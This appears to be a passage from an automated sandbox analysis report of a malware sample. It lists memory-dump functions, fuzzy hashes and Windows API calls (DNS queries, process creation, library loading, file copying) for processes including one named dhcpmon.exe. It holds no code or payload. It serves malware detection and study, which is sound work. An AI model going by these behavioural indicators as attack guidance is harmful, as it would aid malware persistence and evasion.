Instruction ID: 0e059859ecd8312d7aee48b5173c3291bb754076de75a5b0f164738ad7906c4a
Opcode Fuzzy Hash: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction Fuzzy Hash: A211D376504280CFDB11CF10E5C4B16BF71FB94324F24C6A9E8054B65AC33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0092D3E7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.308880919.000000000092D000.00000040.00000001.sdmp, Offset: 0092D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction ID: f0d784d7d7ffb984fc038ba1d01d3bc90ab67e516f0b6f18552dd73a3534de90
Opcode Fuzzy Hash: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction Fuzzy Hash: B511E676505280DFDF01DF10E5C4B56BF72FB94320F24C6A9D8080B66AC33AE85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0227267E, Relevance: .8, Instructions: 794COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aac4c80f143e446ad2b4220fc4de435b4cc87236d266211a33cb6f35e8877652
Instruction ID: 82516159595125a68ba78d1809cdd5c68f76c444d7cd8f28c8cb8503ebaeb6ef
Opcode Fuzzy Hash: aac4c80f143e446ad2b4220fc4de435b4cc87236d266211a33cb6f35e8877652
Instruction Fuzzy Hash: B1427D20E0C2E79BD7435BB884AB2DABFF1EE8631475C85DAC8E05E907D621546BC742

Uniqueness

Uniqueness Score: -1.00%

Function 0227273A, Relevance: .8, Instructions: 776COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b998f39a8818f89532c72dbc8d724f43140f7eecf52ae618cf1f4739a553622
Instruction ID: 38b3d996ec49535a1ebb3f46f642f8950971e334eb246189e07144c012d8e6e9
Opcode Fuzzy Hash: 6b998f39a8818f89532c72dbc8d724f43140f7eecf52ae618cf1f4739a553622
Instruction Fuzzy Hash: 67427C20E0C2E79BD7435BB884AB2DABFF1EE4631475C85DAC8E05E907D621946BC742

Uniqueness

Uniqueness Score: -1.00%

Function 022726BA, Relevance: .8, Instructions: 773COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2732a8a52ddf84e886685c0c39e9730501082f225d03379943e48aca62df4007
Instruction ID: c02e36430ca7610a970229846073233435ba84e1ad38583cb0dc8f59db630271
Opcode Fuzzy Hash: 2732a8a52ddf84e886685c0c39e9730501082f225d03379943e48aca62df4007
Instruction Fuzzy Hash: EB427C20E0C3E79BD7435BB884AB2DABFF1EE4631475C85DAC8E04E907D621546BC742

Uniqueness

Uniqueness Score: -1.00%

Function 0227277F, Relevance: .8, Instructions: 773COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a339b9ba94c461dd1f9fa82639d09ebb2cac5fb44330bd21fff89a96a197bddd
Instruction ID: c46e4f4084e38c957b36c5632b437aa31effb29002577b7dd33e2d8ac6209f33
Opcode Fuzzy Hash: a339b9ba94c461dd1f9fa82639d09ebb2cac5fb44330bd21fff89a96a197bddd
Instruction Fuzzy Hash: F8427C20E0C3E79BD7435BB884AB2DABFF1EE4631475C85DAC8E04E907D621546BC742

Uniqueness

Uniqueness Score: -1.00%

Function 022726E9, Relevance: .8, Instructions: 772COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f42226a56297b654ead0826cb9629ece05b52634093e964c673e1f833cccdc
Instruction ID: 6b0b0ca1a4ba29c29dcbef4c380c6e29c4f86266e8467d911bfa223cb6d80801
Opcode Fuzzy Hash: d9f42226a56297b654ead0826cb9629ece05b52634093e964c673e1f833cccdc
Instruction Fuzzy Hash: EC426C20E0C2E79BD7435BB884AB2DABFF1EE5631475C85DAC8E04E907D621546BC742

Uniqueness

Uniqueness Score: -1.00%

Function 02272722, Relevance: .8, Instructions: 772COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95fd8ad09440521c714e8834033b812e8c85efbeb6baa53df6aac0f1b78b8dbb
Instruction ID: ba2bb2e572fe59625ba50a0ce2f2eedbedd691297464a5b4d9dfb1fe70d8e965
Opcode Fuzzy Hash: 95fd8ad09440521c714e8834033b812e8c85efbeb6baa53df6aac0f1b78b8dbb
Instruction Fuzzy Hash: CF426C20E0C3E79BD7435BB884AB2DABFF1EE5631475C85DAC8E04E907D621546BC742

Uniqueness

Uniqueness Score: -1.00%

Function 02272767, Relevance: .8, Instructions: 772COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db216a1fc9d754e8b5b5f78c4dcbe7c5035e088dfe1bfbb4cf6e08a1847003a
Instruction ID: af8da9cf85babcc0f7febd03609ae7385d4ca3041c8b9e1e51ab23b2af9457a7
Opcode Fuzzy Hash: 2db216a1fc9d754e8b5b5f78c4dcbe7c5035e088dfe1bfbb4cf6e08a1847003a
Instruction Fuzzy Hash: 91427C20E0C3E79BD7435BB884AB2DABFF1EE5631475C85DAC8E04E907D621546BC782

Uniqueness

Uniqueness Score: -1.00%

Function 022726D6, Relevance: .8, Instructions: 771COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3feaa8b43599ab7da7a432e5a9d8be9967d0ebf4aba9d5fb6633b7c76cd066
Instruction ID: 8cddfc7a0fed5bf699508823f11ec514597e5bad59c602a74144a209cba5670b
Opcode Fuzzy Hash: 4b3feaa8b43599ab7da7a432e5a9d8be9967d0ebf4aba9d5fb6633b7c76cd066
Instruction Fuzzy Hash: 41426B20E0C3E79BD7435BB884AB2DABFF1EE9631475C85DAC8E04E907D621546BC742

Uniqueness

Uniqueness Score: -1.00%

Function 02272703, Relevance: .8, Instructions: 771COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb8c5f90418b15c25f3150b33487fa989ea59f108807ea9f67223f29a5fd20e3
Instruction ID: ac4e54f0186f8ff6fb9970e6862de9f9409eac0a092b858c5e10204c615b12ed
Opcode Fuzzy Hash: bb8c5f90418b15c25f3150b33487fa989ea59f108807ea9f67223f29a5fd20e3
Instruction Fuzzy Hash: C8426C20E0C2E79BD7435BB884AB2DABFF1EE5631475C85DAC8E04E907D621546BC782

Uniqueness

Uniqueness Score: -1.00%

Function 02273B0C, Relevance: .8, Instructions: 767COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ab9afd64d36a8f06629b5c18c3847de4d198a124495941a75defb669628182
Instruction ID: c01d2758924161b99dedd470a810c7cd795cbc16843c6e9e283a448ed3d84d47
Opcode Fuzzy Hash: c6ab9afd64d36a8f06629b5c18c3847de4d198a124495941a75defb669628182
Instruction Fuzzy Hash: 30426B20E0C2E79BD7435BB884AB2DABFF1EE5631475C85DAC8E04E907D621546BC782

Uniqueness

Uniqueness Score: -1.00%

Function 02272B5B, Relevance: .8, Instructions: 767COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d639313f4bdcac3bdcfa5c77f5941f4e5caac3813baf4f4759574b93c3231c
Instruction ID: 1fcea6e59aae9795ebb59c57269971d2c5034ea4965a5020b32d9769db2c57c3
Opcode Fuzzy Hash: e7d639313f4bdcac3bdcfa5c77f5941f4e5caac3813baf4f4759574b93c3231c
Instruction Fuzzy Hash: 4F426B20E0C2E79BD7435BB884AB2DABFF1EE5731475C85DAC8E04E907D621546BC782

Uniqueness

Uniqueness Score: -1.00%

Function 02273D8B, Relevance: .8, Instructions: 767COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 189c4bf54506003320f67bd51cf008497046ff7cbde3a48484badc58d66f625e
Instruction ID: ec7f9de3474df0430675c29dda15201c12a14ac7187dbd98f38e4c5e3f13f320
Opcode Fuzzy Hash: 189c4bf54506003320f67bd51cf008497046ff7cbde3a48484badc58d66f625e
Instruction Fuzzy Hash: 57426B20E0C2E79BD7435BB884AB2DABFF1EE5631475C85DAC8E04E907D621546BC782

Uniqueness

Uniqueness Score: -1.00%

Function 02274621, Relevance: .8, Instructions: 756COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37f6b5a438aab2f351b49e7aa40b4d2e303ed0b6e4035b9d2f0920064adff3e3
Instruction ID: 8fe8fbf5b580ddb776d654e80e0d9aa23dbac349b420a5b0d066c4a5cef3886f
Opcode Fuzzy Hash: 37f6b5a438aab2f351b49e7aa40b4d2e303ed0b6e4035b9d2f0920064adff3e3
Instruction Fuzzy Hash: F5427C20E0C3E79BD7435BB884A72DABFF1EE8631475C85DAC8E05E907D621546BC782

Uniqueness

Uniqueness Score: -1.00%

Function 02274B88, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a174e020b51de6b8c6fa0b491b71f0a998d1b4f88ff22ea90fa6b5c787beca
Instruction ID: 1c673b321f7590ca45311ca76fd4b9e5c53a99ae17ff446cae25e802bf8c1ee7
Opcode Fuzzy Hash: e9a174e020b51de6b8c6fa0b491b71f0a998d1b4f88ff22ea90fa6b5c787beca
Instruction Fuzzy Hash: D8A17C71E1412A8BCB14DFA9C9806AEFBF1FF88305F248669D455E720AD734ED42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02272178, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd6cb717780515cfd8042366cfbf08cf859c0641efdc1a8eb14570f8dcbe1b1b
Instruction ID: 330ab4f519af74519b93378fd934ba2471369b210d38ca3b681cd14cd1501180
Opcode Fuzzy Hash: cd6cb717780515cfd8042366cfbf08cf859c0641efdc1a8eb14570f8dcbe1b1b
Instruction Fuzzy Hash: 25617070A156048FE708EFBBE884A9ABBE7EBC9304F50C839D0059B278DF7459059F90

Uniqueness

Uniqueness Score: -1.00%

Function 02272188, Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.309064885.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa13a8e37b4aa707da4521016125e4bc3a904500d8d34eede18fab64c89bb21
Instruction ID: d7d02758d4f488c0d33a299d6ab9873960ef1a257e66c7921cc3772d754b8734
Opcode Fuzzy Hash: 5aa13a8e37b4aa707da4521016125e4bc3a904500d8d34eede18fab64c89bb21
Instruction Fuzzy Hash: E1614F70A156048FD748EFBAE884A9ABBE7EBC9304F94C839D0059B278DF7459059F90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: LFEs2N6DU4.exe PID: 3784 Parent PID: 2752 LFEs2N6DU4.exeCOMMON

Executed Functions

Function 069E3738, Relevance: 1.7, APIs: 1, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.538845413.00000000069E0000.00000040.00000001.sdmp, Offset: 069E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c265d1d03cfe3a5881db91532d8454ec635cb5be2e56bbbad14c34e8ddbe3f3
Instruction ID: 38d093cdbb514be6c52348a2f9667e23f522a4736a7acd34bb8b6528e5b307a6
Opcode Fuzzy Hash: 2c265d1d03cfe3a5881db91532d8454ec635cb5be2e56bbbad14c34e8ddbe3f3
Instruction Fuzzy Hash: 018158B1D00219DFDB11DFA9C880AEEFBB5FF88314F20892AD415AB650DB719945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02D893E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02D8962E

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a8eb9967d7371e914fb68f7bcd97038f0464328cea52dc8cefd6549a1fb5b106
Instruction ID: eedd6760406295d92984529217664a4f418e3a0531a75c260f5dc87864061e41
Opcode Fuzzy Hash: a8eb9967d7371e914fb68f7bcd97038f0464328cea52dc8cefd6549a1fb5b106
Instruction Fuzzy Hash: 90711270A00B058FD724EF6AD4557AABBF5BF88214F00892ED48AD7B50DB74E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02D8FB98, Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D8FD0A

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b09f432a2e8b00406da83e6e2fa479d94cf2db9b827b63b093e9f1334f66f303
Instruction ID: 8efd135083a3721ff1aac0e09e28f4309e0a1006a036563e8e71da62f97e351d
Opcode Fuzzy Hash: b09f432a2e8b00406da83e6e2fa479d94cf2db9b827b63b093e9f1334f66f303
Instruction Fuzzy Hash: C451E0B1D04249AFDF11CFA9C980ADEBFB1FF49314F24816AE518AB220D7719955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 069E1AD5, Relevance: 1.6, APIs: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 069E3918

Memory Dump Source

Source File: 0000000D.00000002.538845413.00000000069E0000.00000040.00000001.sdmp, Offset: 069E0000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: dfbeb4f6b415dd6f81a4756d11ed6a6310bc7b1c1581a85956150ed93b109506
Instruction ID: bb3c1784dc7370b99781882684ebc65fe4c19578d85717edf053dc6b6c7ce7b3
Opcode Fuzzy Hash: dfbeb4f6b415dd6f81a4756d11ed6a6310bc7b1c1581a85956150ed93b109506
Instruction Fuzzy Hash: 885124B1D00258DFDB11CFA9C8816DEBBB5FF48314F24852AE809AB650DB70A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 069E37E4, Relevance: 1.6, APIs: 1, Instructions: 141networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 069E3918

Memory Dump Source

Source File: 0000000D.00000002.538845413.00000000069E0000.00000040.00000001.sdmp, Offset: 069E0000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 53a8a5b87ff8a6c2f49fd257723401e9b43c221a4cdc12b1b4e5df512394d3e1
Instruction ID: 92e0b8ae8cffd29d1dd8f13c6570e3fded163d2670a81b43cbe5d79b9e13d670
Opcode Fuzzy Hash: 53a8a5b87ff8a6c2f49fd257723401e9b43c221a4cdc12b1b4e5df512394d3e1
Instruction Fuzzy Hash: 8D512371D00259DFDB15CFA9C880BDEBBB5FF48314F24852AE819AB250DB709846CF91

Uniqueness

Uniqueness Score: -1.00%

Function 069E1ADC, Relevance: 1.6, APIs: 1, Instructions: 140networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,?,?,?,?,?), ref: 069E3918

Memory Dump Source

Source File: 0000000D.00000002.538845413.00000000069E0000.00000040.00000001.sdmp, Offset: 069E0000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: b571892990006041bffb10aab232c55338a7c51cd7751c74ea67ce72574d79aa
Instruction ID: 5d7afc24914be6b96968d71705e74572b19c3bfee891de3ea72f539e95d73729
Opcode Fuzzy Hash: b571892990006041bffb10aab232c55338a7c51cd7751c74ea67ce72574d79aa
Instruction Fuzzy Hash: 4B5124B1D00258DFDB11CFA9C881BDEBBB5FF48314F24852AE805AB250DB70A846CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02D8FB61, Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D8FD0A

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: cbdb8bc9f0a4cfa51c47aa0364657203d0f0095332fbdedef61185a9eec1fd59
Instruction ID: 0fefda14d87aa40fb796b6dcc8954102fdb7dd00115f701528a50eead04d51db
Opcode Fuzzy Hash: cbdb8bc9f0a4cfa51c47aa0364657203d0f0095332fbdedef61185a9eec1fd59
Instruction Fuzzy Hash: 6051EFB1D003499FDB14DFA9D884ADEBBB1FF48314F64812AE915AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02D8DA04, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D8FD0A

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5091d05e6440b48871d8385d21f378ac76b2088c767ee6180b7a8cf41d40bd8a
Instruction ID: a448f07417d2b864cacaa506f200835307d4ecd15da540ab196ad27f98e9b142
Opcode Fuzzy Hash: 5091d05e6440b48871d8385d21f378ac76b2088c767ee6180b7a8cf41d40bd8a
Instruction Fuzzy Hash: 4F51CDB1D002099FDB14DFA9C884ADEBBB5FF48314F64812AE919AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02D8A14C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D8BCC6,?,?,?,?,?), ref: 02D8BD87

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2d7ed1e634450ba8d68938a8160ef103dc14ecca8db2710d9fe7e5e69d86421c
Instruction ID: 3743913f3609acd442826e60c143cd3ece83fd5b1458c3d087229926064aab67
Opcode Fuzzy Hash: 2d7ed1e634450ba8d68938a8160ef103dc14ecca8db2710d9fe7e5e69d86421c
Instruction Fuzzy Hash: 6221E7B5900248EFDB10DFA9D584ADEBBF4EB48314F14841AE955A7310D374A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D8BCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D8BCC6,?,?,?,?,?), ref: 02D8BD87

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1795e3d9c0f85641170df6f3f84f1966d89bf5645c7ae18f330e542b36afdaa0
Instruction ID: 01c3a0813764d1b3b80d0fedec97ccf88aef836c0bf65258671683463e4dd728
Opcode Fuzzy Hash: 1795e3d9c0f85641170df6f3f84f1966d89bf5645c7ae18f330e542b36afdaa0
Instruction Fuzzy Hash: D82105B5900248AFDB10CFAAD884ADEBFF8EF48324F14841AE914A7310D374A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D88768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02D896A9,00000800,00000000,00000000), ref: 02D898BA

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8f8dcda1857671bbe16fd1f000fc7a6e71f8166093491a11a71ac3365c02c6ec
Instruction ID: 8099ee800572d974d00ea2d0fd05328f1589cea5ee3d059d8288e236c16ad424
Opcode Fuzzy Hash: 8f8dcda1857671bbe16fd1f000fc7a6e71f8166093491a11a71ac3365c02c6ec
Instruction Fuzzy Hash: 2611F2B69002498FDB10DFAAC444AEEBBF4EB48324F14842EE559A7700C375A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D89849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02D896A9,00000800,00000000,00000000), ref: 02D898BA

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c6cce228a2908434a37b82a3e40e1d3d4c4cfaf2905303fc723c762e33a3a36
Instruction ID: c5e21eba5bafb082091656710bb5422a3b36334ee7c070135a4fc01002de30d3
Opcode Fuzzy Hash: 9c6cce228a2908434a37b82a3e40e1d3d4c4cfaf2905303fc723c762e33a3a36
Instruction Fuzzy Hash: 601114B2D002498FDB10DFAAD444AEEFBF4EB48324F14852EE555A7710C374A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D895C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02D8962E

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: db98d0614d12a91aeff11fc7c231355ac44c66be7bb511f00e3ad7d2f5fd5928
Instruction ID: fcbef152e6aaa2bf90cac446f7e35e06f697977d5798ac0a9ac43d8f3aca91b3
Opcode Fuzzy Hash: db98d0614d12a91aeff11fc7c231355ac44c66be7bb511f00e3ad7d2f5fd5928
Instruction Fuzzy Hash: E611DFB6D006898FDB10DF9AC445BDEFBF4AF88224F14842AD459A7710C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D8DA3C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,02D8FE28,?,?,?,?), ref: 02D8FE9D

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a9f160a6dca2fed40c1617dd2afa5ae839b2086f3a71b41fa4a35a429ad44611
Instruction ID: 8e96a97889dcf2436efd5d8e880fbe9b9a7f82d08da58e6825a39bd3f5bdf2a0
Opcode Fuzzy Hash: a9f160a6dca2fed40c1617dd2afa5ae839b2086f3a71b41fa4a35a429ad44611
Instruction Fuzzy Hash: 4D1133B29002488FDB10DF9AC485BEFBBF8EB48324F10841AE918B7700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D8FE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,02D8FE28,?,?,?,?), ref: 02D8FE9D

Memory Dump Source

Source File: 0000000D.00000002.534449975.0000000002D80000.00000040.00000001.sdmp, Offset: 02D80000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 0a216e5f4df6c4f196270420f428100b05b705003a978c869d939226fb790790
Instruction ID: a73144af395b98bad538f92efae3dbc9a57097cbd6a842a709d08aed2766ba3a
Opcode Fuzzy Hash: 0a216e5f4df6c4f196270420f428100b05b705003a978c869d939226fb790790
Instruction Fuzzy Hash: F71103B69002499FDB10DF99D589BDEBBF8EB48324F10841AE958B7740C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 6188 Parent PID: 1104 dhcpmon.exeCOMMON

Executed Functions

Function 026ABBF0, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 026ABE26

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 23a58fd9d7d342c8f0275c54f29af698537e7f5f976b2186bdc52467cd660dc2
Instruction ID: 7b3f58b18df7c92ea5d5d35e2e61d350fdf506202d759a8dc71ec251f5fb5674
Opcode Fuzzy Hash: 23a58fd9d7d342c8f0275c54f29af698537e7f5f976b2186bdc52467cd660dc2
Instruction Fuzzy Hash: EB914D71D00219CFDB10DFA5C851BEDBBB2BF58318F14856AE809A7290DB749D85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 026ADD90, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 026ADE91

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: d76036ce7e1a094d987d9bfcec80dbb4819bcae677c731dd90bec9dc9d9728c1
Instruction ID: dba850ff17ef77f410ac71d6d51bacfb186a763ba7f5f433e59c494b030a9187
Opcode Fuzzy Hash: d76036ce7e1a094d987d9bfcec80dbb4819bcae677c731dd90bec9dc9d9728c1
Instruction Fuzzy Hash: A9414574D002588FDB14CFA9C8A4BDEBBF1BF48318F148469E819AB750D7B4A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 026A9217, Relevance: 1.6, APIs: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 026A92B1

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 036be8ace0e6f35e7ee770cdd22d40a9cb67a17ae7525077e0abd6049c081aa5
Instruction ID: d9b467b6487afefc3ac7e800b942ee23cc5ec7b39a62c346638a272adcba3fef
Opcode Fuzzy Hash: 036be8ace0e6f35e7ee770cdd22d40a9cb67a17ae7525077e0abd6049c081aa5
Instruction Fuzzy Hash: 553112B0E06248DFDB10CFA9D584BDDBBF5AF48314F24806AE405AB390DBB4A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 026A9220, Relevance: 1.6, APIs: 1, Instructions: 71libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 026A92B1

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c541492d2148709217dba5a997c41fb609e0529b962d96df342b524d6a12aa27
Instruction ID: e270033806cdeb48d4b7ad0d7a328124afd12b4710fb05c14cc6c9ba862c5287
Opcode Fuzzy Hash: c541492d2148709217dba5a997c41fb609e0529b962d96df342b524d6a12aa27
Instruction Fuzzy Hash: 6031E1B0D02208DFDB14CFA9D584BCEBBF5AF48314F24846AE405AB350DBB4A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 026A9CC8, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 026A9D61

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
